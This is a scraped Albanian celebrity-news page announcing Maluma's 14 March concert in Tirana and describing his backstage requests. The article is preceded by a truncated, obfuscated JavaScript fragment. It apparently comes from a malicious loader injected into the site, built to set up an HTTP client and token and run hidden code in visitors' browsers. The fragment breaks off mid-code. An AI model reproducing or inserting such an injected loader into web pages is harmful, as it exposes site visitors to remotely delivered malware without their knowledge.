;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Maluma performon në Tiranë por fillimisht pati disa kërkesa shumë interesante!

By

Këngëtari i njohur në botë, Maluma do të këndojë në Tiranë më 14 mars.

Ky lajm i cili ka qarkulluar për një kohë të gjatë në media, u konfirmuar nga kryetari i Tiranës, Erion Veliaj në një postim në Instagram.

Në videon e ndarë nga ai, Maluma bën thirrje për të qenë pjesë e koncertit i cili mbahet për pak ditë në sheshin Nënë Tereza.

Në emisionin e “Shqipëria Live”, e ftuar ishte Uarda Koçi e cila tregoi disa nga kërkesat që ka paraqitur këngëtari me famë botërore, Maluma para koncertit në Shqipëri, më 14 mars.

View this post on Instagram

A post shared by Erion Veliaj (@erionveliaj)

Por fillimisht ai pati disa kushte. Kërkesat e paraqitura nga stafi i këngëtarit fillonin me një tavolinë ping-pongu në prapaskenë.

“Maluma është një djalë super solar dhe gjithë ky ndriçim, pozitivitet i tij përcillet tek stafi i jashtëzakonshëm”, tha Uarda, njëra ndër organizatoret e koncertit.

Maluma përtej kësaj ka pasur edhe disa kërkesa tjera. Kërkesat e tij përfshinin kafenë, çajin dhe mjaltin.

Një kërkesë tjetër po aq e domosdoshme janë çamçakëz pa sheqer, pasi në këtë mënyrë ai redukton stresin.

Artikuj të ngjashëm